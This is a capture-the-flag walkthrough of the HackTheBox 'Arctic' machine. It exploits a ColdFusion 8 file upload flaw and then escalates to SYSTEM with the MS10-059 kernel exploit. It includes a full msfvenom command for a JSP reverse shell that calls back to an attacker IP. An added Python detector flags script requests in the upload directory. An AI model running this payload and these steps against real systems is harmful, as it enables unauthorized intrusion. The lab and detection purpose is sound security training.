HackTheBox “Arctic” Walkthrough
Arctic is an easy-level Windows machine on HackTheBox. An arbitrary file upload vulnerability in the Adobe ColdFusion 8 web application gives user-level access, and privilege escalation is then achieved with a Windows kernel exploit.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to scan for open ports and services:
Visit the application on port 8500.
Accessing the /CFIDE directory redirects to an alternate file listing.
Upon selecting the administrator option, an “Adobe ColdFusion 8” application is presented.
Performing a basic searchsploit search reveals the presence of several available exploits.
In addition to using searchsploit, conducting a search on Google also yields potential exploits.
Let’s go with the following exploit.
The exploit has been downloaded to our attack box.
The exploit requires a JSP file containing a reverse shell. We can generate one with msfvenom:
sudo msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.11 lport=4343 -f raw > payload.jsp
Once the payload has been created, we will proceed to execute the script. Please refer to the usage instructions provided:
Before accessing the website, it is necessary to initiate a listener to capture the shell. This can be accomplished using netcat.
After starting the listener, we will proceed to visit the following page:
http://10.10.10.11:8500/userfiles/file/exploit.jsp
Upon accessing the page, a shell is obtained.
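From the defender's side, the request above is the detectable moment: a server-executed script being fetched from the upload directory. The following is an added example, not part of the original walkthrough or the exploit it uses; it assumes Common Log Format access logs, and the log lines, client addresses and function names are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumptions: Common Log Format access logs; the upload directory is the one
# seen in the walkthrough URL. The sample lines below are constructed.
UPLOAD_PREFIX = "/userfiles/file/"
SCRIPT_EXTS = (".jsp", ".jspx", ".cfm", ".cfml", ".cfc")  # server-executed types

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize_path(target):
    """Decode and canonicalise a request target so variants compare equal."""
    path = unquote(target.split("?", 1)[0])
    # Drop servlet path parameters (";name=value") from every segment.
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    path = posixpath.normpath(re.sub(r"/+", "/", path))
    return path.lower()  # Windows paths are case-insensitive

def suspicious_requests(lines):
    """Return (ip, method, path, status) for script requests in the upload dir."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalize_path(m["target"])
        if path.startswith(UPLOAD_PREFIX) and path.endswith(SCRIPT_EXTS):
            hits.append((m["ip"], m["method"], path, int(m["status"])))
    return hits

SAMPLE_LOG = [  # constructed
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 1234',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /userfiles/file/report.pdf HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /userfiles/file/exploit.jsp HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /UserFiles/File/a%2Ejsp;x=1?c=1 HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2024:10:04:00 +0000] "GET /userfiles/file/notes.jsp.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("ALERT script request in upload directory:", hit)
```

A hit with status 200 means the server handed the file to a script handler; an upload directory should be served as static content only, so any such response is worth investigating.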
As we currently have limited privileges, we need to elevate our access rights. To assist with this, we will use Windows Exploit Suggester to look for potential exploits. Let’s begin by retrieving the system information using the command “systeminfo”.
We have saved the system information obtained from the target machine in a text file within our attack box. You can download the tool from the following location: Windows Exploit Suggester.
Download the Windows Exploit Suggester’s database file.
Run the suggester using the provided database and system information inputs.
We will proceed with the MS10-059 exploit. You can download the exploit here.
To transfer the executable file to the Windows system, we will set up a Python HTTP server in the directory containing the file.
On the Windows machine, a folder named C:/Temp will be created. Subsequently, we will use certutil to transfer the executable file to this location.
Execute the exploit.
We need to start a listener.
Re-run the exploit, providing the required inputs of the attacking box’s IP address and port.
As a result, a system shell is successfully obtained.
Cheers.